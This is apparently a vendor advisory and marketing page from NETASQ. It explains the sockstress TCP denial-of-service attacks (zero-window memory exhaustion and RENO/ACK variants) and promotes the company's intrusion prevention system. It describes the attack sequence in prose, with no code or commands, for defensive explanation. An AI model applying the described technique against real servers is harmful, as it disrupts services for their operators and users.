Sockstress

Some useful links
­Official sockstress alert

Sockstress



On September 8, 2009, Outpost 24 published a TCP-based software tool suite. This software suite, called “sockstress”, combines several attacks that hijack the use of the protocol with the aim of making a server inaccessible. This attack type is commonly known as a “denial of service”. The attacks available on the sockstress tool suite may prove to be disastrous as they are extremely difficult to counter.

 Denial of service
A denial of service (DoS) attack is launched with the aim of affecting the availability of a network service. The success of such attacks is measured by the inability to access the desired service. The main targets of these attacks are public sites and more particularly e-commerce or online betting sites. For the latter, denial of service attacks usually go hand in hand with other fraudulent practices such as blackmail
DoS attacks fall under 2 main types:
. Denial of service by flooding access (attacks the bandwidth)
. Denial of service by flooding server resources (processor and/or memory)
Corporate servers generally have more resources than their hackers have. A successful DoS therefore relies on the use of several attack sources (in this case, we are referring to a distributed denial of service or DDoS) or the exploitation of a software vulnerability that would allow consuming all the server’s resources (software DoS).

The sockstress tool exploits various TCP mechanisms in order to flood the memory resources of any TCP server that can be accessed publicly.

A few technical points
TCP is the cornerstone of internet and inter-company communications as it enables secure exchanges of data and acts as a support for many application protocols – web, mail, FTP, instant messaging, etc.

The sockstress tool hijacks a TCP feature called a “TCP Window”. This mechanism allows optimizing exchanges of information between a client and a server.

Indeed, once introductions (TCP Handshake) have been made, the client and the server will exchange data (DATA) and acknowledgements of receipt (ACK). The optimization that the TCP window provides prevents an acknowledgement of receipt from being sent systematically. In each packet, the client and the server will announce the amount of data that they can receive without having to wait for an acknowledgement. This value is called the "TCP window size".

The sockstress attack hijacks the use of the TCP window to drain the server’s resources.

Sockstress attack on the TCP window
The sockstress attack allows draining the memory resources of a TCP server very quickly by shrinking the size of the TCP window. The sequence of an attack launched by the sockstress tool can be described as follows:
1. Initialization of the connection between the client and the server (TCP Handshake)
2. The client will send 2 consecutive queries to the server under attack:
a. An application query that implies a server response
b. A TCP packet that indicates to the server that the client cannot receive data for the moment (TCP window equals zero)
3. The client will keep the TCP connection open and keep the window size at zero.

When the server receives the first query from the client, it will prepare the data in order to send a response. But when the client’s window changes to zero, the server will suspend the sending of the query and keep a large amount of data in memory. When the server consumes all the memory available for storing these data on standby, it will no longer be able to respond to any legitimate requests.

Sockstress makes this attack very easy to carry out. All you need is to indicate the target server and the number of connections to keep simultaneously.

The effectiveness of the sockstress attack is due to the fact that very few simultaneous connections are needed to fully flood even the most powerful server that can be found on the market.

Sockstress attack on the RENO algorithm
Sockstress provides many variations and optimizations to make attacks more effective and to bypass the countermeasures that may be set up. The size of the TCP window indicated to the server may vary from zero to several bytes while maintaining the effectiveness of the attack.

Sockstress also makes it possible to cause the server to consume resources by sending several acknowledgement packets successively (ACK). This behavior – known as TCP RENO – modifies the server’s reaction and mobilizes many resources which generally end up with a full denial of service on the attacked server.

Lastly, sockstress optimizations allow minimizing the client’s consumption of resources. These optimizations use a mechanism that closely resembles "SYN cookies". By integrating key information about the current connection into a TCP option, the sockstress client will avoid having to keep all the information in memory. It can then maintain a greater number of simultaneous connections.

 3 major protocol attacks within 1 year
The publication of sockstress is the third major protocol attack within a year after the discovery of the DNS “Kaminsky” vulnerability and the attack on “nkiller2” web servers. This outbreak of protocol attacks represents a real threat for enterprises. Indeed, unlike application attacks that only target a limited number of companies, protocol attacks are an immediate threat not only to all company networks, but also to the stability of the internet network.

The development team that created the sockstress software tool has by the way assessed the scale of the risk and has informed the various players in the networking and security domain before having publicly distributed this tool.

Nonetheless, despite this responsible announcement, antivirus, firewall and IPS (intrusion prevention system) publishers are unable to create effective protection signatures.

 The Achilles heel of security solutions
 Antivirus and IPS solutions on the market block attacks by comparing data submitted to them against one or several known attack databases. Conventionally, antivirus solutions concentrate on scanning files while IPS solutions scan network traffic in real time. However, in both cases, an attack will be detected when it corresponds exactly to the information contained in the database of the security solution.

As for sockstress, a snapshot of the attack cannot be made as the attacks conform to TCP standards (valid use) and no specific data is needed. An antivirus or IPS signature therefore cannot differentiate fraudulent use of the TCP window from normal behavior. Unfortunately, in many cases, the security solution itself will be vulnerable to sockstress attacks. Indeed, the operating systems on these solutions use the same TCP implementations and react in the same way as a server that is vulnerable to sockstress.

The only solution for many companies is therefore to ensure that all their network servers are protected from this attack. In most cases, the service will need to be updated.

 NETASQ’s protection
The NETASQ intrusion prevention system performs a full TCP scan. Each TCP connection is tracked by the NETASQ IPS, which ensures the validity of the protocol and detects abnormal behavior. To effectively block the sockstress attack, NETASQ’s IPS detects variations in the TCP window size and automatically adapts its behavior in order to end the attack without blocking legitimate connections

Likewise, NETASQ’s IPS acts effectively against attempts to enable TCP RENO attacks. Offending packets will be automatically blocked. The server therefore will not enable this algorithm which consumes a lot of resources.
INTERESTED IN
Find a reseller near you


NETASQ©Copyright 2011. All rights reserved Legal